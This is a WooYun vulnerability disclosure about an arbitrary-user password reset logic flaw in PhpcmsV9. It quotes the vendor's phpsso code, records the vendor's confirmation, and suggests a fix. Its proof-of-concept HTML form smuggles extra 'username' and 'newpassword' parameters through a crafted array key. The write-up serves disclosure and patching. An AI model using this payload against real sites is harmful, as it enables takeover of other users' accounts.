当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-017119
漏洞标题:
PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发
相关厂商:
phpcms
漏洞作者:
我想拿个shell
提交时间:
2013-01-09 11:37
修复时间:
2013-02-23 11:38
公开时间:
2013-02-23 11:38
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-01-09: 细节已通知厂商并且等待厂商处理中
2013-01-09: 厂商已经确认,细节仅向厂商公开
2013-01-19: 细节向核心白帽子及相关领域专家公开
2013-01-29: 细节向普通白帽子公开
2013-02-08: 细节向实习白帽子公开
2013-02-23: 细节向公众公开

简要描述:

由于某处的实现机制没有考虑到某个条件,导致了一个任意用户密码重置漏洞。
建议漏洞危害设置为高。

详细说明:

其实我在发第一个漏洞的时候,就看到了
WooYun: PhpcmsV9 SQL注射 2013年贺岁第一发
提到的通行证的代码:

parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);


在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
我把它留给了你们。
不知道你们发现了它没有。
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
也就是
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
其实我们有这样的机会,看看代码,如下:

public function auth_data($data) {
		$s = $sep = '';
		foreach($data as $k => $v) {
			if(is_array($v)) {
				$s2 = $sep2 = '';
				foreach($v as $k2 => $v2) {
						$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
					$sep2 = '&';
				}
				$s .= $sep.$s2;
			} else {
				$s .= "$sep$k=".$this->_ps_stripslashes($v);
			}
			$sep = '&';
		}
		$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
		return $auth_s;
	}


可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
举个例子
$a[aaa=a&bbb] = 'a';
会变成aaa=a&bbb=a
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
这个时候,我们可以再去看一个函数。
就在这个文件内:

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
		if($email && !$this->_is_email($email)) {
			return -4;
		}
		return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
	}


这是向通行证发了这样一个请求。
我们再跟到通信证代码里去看看,就会有所发现。

public function edit() {
//能省就省,太长了不是吗?
if($this->username) {
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
				$res = $this->db->update($data, array('username'=>$this->username));
			} else {
				file_put_contents('typeb.txt',print_r($data,1).$this->uid);
				$res = $this->db->update($data, array('uid'=>$this->uid));
			}


好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
我当然找到了:
phpcms9/phpcms/modules/member/index.php

$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);


然后就没有然后了。

漏洞证明:

我还是给个视频说明吧。

密码:nicai
第四分钟后就别看了,我从虚拟机切出来时我电脑卡了。
此次用到的表单如下:

<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
				<table width="100%" cellspacing="0" class="table_form">
					<tr>
						<th width="80">邮箱:</th>        
						<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
					</tr>
					<tr>
						<th width="80">原密码:</th>        
						<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
					</tr>
					<tr>
						<th>新密码:</th>
						<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
					</tr>
					<th></th>
					<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
					</tr>
				</table>
				
			</form>


修复方案:

urlencode那个key和value
话说,你看看,每次都是这么精彩的分析,这么能说明问题的漏洞,这样好的证明以及实际可用的解决方案,为啥会拿和那种无聊xss一样的rank值呢?
要有审美观。

版权声明:转载请注明来源 我想拿个shell@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-01-09 13:27

厂商回复:

感谢,请联系我们官网客服,留下你的联系方式!!

最新状态:

暂无